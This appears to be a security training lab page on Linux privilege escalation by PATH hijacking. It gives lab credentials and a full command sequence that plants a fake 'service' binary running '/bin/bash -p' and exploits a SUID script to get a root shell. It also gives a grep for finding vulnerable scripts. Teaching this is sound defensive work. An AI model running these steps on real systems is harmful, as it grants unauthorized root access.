⚠️ Pracivo Security Lab — Linux privilege escalation techniques. Start as a low-privilege user and escalate to root.
Lab Credentials: ram / pracivo | alice / alice123 | root / toor (goal: escalate to this)
PATH Hijacking
PRIVILEGE ESCALATION
# Scenario: root runs a script that calls a command without full path
cat /usr/local/sbin/system-monitor.sh
# #!/bin/bash
# service apache2 status ← no full path /usr/sbin/service
# If this script has SUID or is called by a root cron:
ls -la /usr/local/sbin/system-monitor.sh
# -rwsr-xr-x 1 root root system-monitor.sh ← SUID!
# Step 1: Create a fake 'service' binary in a writable directory
mkdir /tmp/evil
echo '#!/bin/bash' > /tmp/evil/service
echo '/bin/bash -p' >> /tmp/evil/service
chmod +x /tmp/evil/service
# Step 2: Prepend our directory to PATH
export PATH=/tmp/evil:$PATH
# Step 3: Run the vulnerable script — it calls our fake 'service'
/usr/local/sbin/system-monitor.sh
# You now have a root shell
# Check current PATH:
echo $PATH
# Find scripts that call commands without full paths:
cat /usr/local/sbin/*.sh | grep -v "^#" | grep -v "/"